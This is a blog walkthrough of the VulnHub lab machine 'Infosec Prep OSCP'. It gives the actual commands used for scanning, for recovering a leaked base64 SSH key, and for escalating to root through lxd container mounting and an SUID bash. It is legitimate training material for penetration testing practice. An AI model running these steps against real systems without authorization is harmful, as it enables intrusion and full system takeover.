InfoSec Prep OSCP - Vuln Hub Machine

Detailed walkthrough of the machine Infosec Prep OSCP that was released on VulnHub 11 Jul 2020 by FalconSpy

Machine Summary

Machine has a web application running, upon enumerating the directories /secret.txt contains a SSH Private key which is encoded in base64. After decryption, we can login as user oscp with the SSH Private key. we can esclate the privileges to root in two ways 1. Exploiting the lxd group 2. Exploiting the SUID - Bash

Nmap Scan

As the golden rule i started with nmap scan

nmap -sC -sV -p- 192.168.0.101

It has two ports open

PortService
22ssh
80http
33060mysqlx

Enumeration on Port 80

I started to enumerate on the site, it was a wordpress site so i ran a wpscan on it but nothing poped up. I manually enumerated on the site but i ended up with no usefull information for enumeration

I ran gobuster on the site to enumerate the files and directories

gobuster dir -u http://192.168.0.101/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,conf

secret.txt seems to be interesting, I opened it on the browser

Acquiring User Shell

It was encoded on base64 so i decoded it, viewing that it was a SSH private key

echo "Base64_Hash" |base64 -d >> id_rsa

We need some usernames to login through ssh using the private key so i tried guessing username and username oscp worked. We also need to add permissions to the private key

chmod 600 id_rsa

I logged in onto the machine using the private key for the user oscp

ssh -i id_rsa oscp@192.168.0.101

Privilege Escalation

I enumerated the machine with current privilege as oscp, found two things that could grant us root shell

  1. User is part of lxd group
  2. Suid was configured for /usr/bin/bash

By these two ways, we can proceed to root.

Privilege Escalation through Exploiting lxd group

LXC —short for “Linux containers”, is a solution for virtualizing software at the operating system level within the Linux kernel.

LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. ie. a low privilege user can create a bridge between sockets on the host and its containers. when bridging from an existing socket on the host to a new socket in a container, it makes the connection with the credentials of the LXD service. so when user speaks to the container, the messages (command) and it lands on the container with root privileges (commands are executed with the root)

Executing lxc directly didn’t work so i tried executing it with the full path of the binary file ie. /snap/bin/lxc

/snap/bin/lxc

First i created a storage pool

/snap/bin/lxd init

I moved on with the default settings, now we need to create a container called test

/snap/bin/lxc init ubuntu:18.04 test -c security.privileged=true

We configure that container such that all the files and folders of the host is copied or present in /mnt/root directory

/snap/bin/lxc config device add test whatever disk source=/ path=/mnt/root recursive=true

Now we need to start the container called test

/snap/bin/lxc start test

We execute the container

/snap/bin/lxc exec test bash

Now we go into the directory /mnt/root/root to get the flag.txt

This exploit methodolgy will only work when the target machine has access to internet

Exploiting the misconfigured SUID - bash

SUID - SUID is nothing but a special permission bit available in Linux, that achieves this with a lot of ease. If you are the owner of an executable file, with the help of SUID permission set, other users will be running the executable with your permission and not theirs.

We can list the binaries with SUID permissions using the command below

find / -perm -u=s -type f 2>/dev/null

Bash was the juicy binary. we can exploit it to get the root privilege

GTFOBins

bash -p

This granted us the shell with root privilege

Happy Hacking !


© 2020. All rights reserved to r3dw0lf_sec.

Powered by Hydejack v9.0.0-rc.6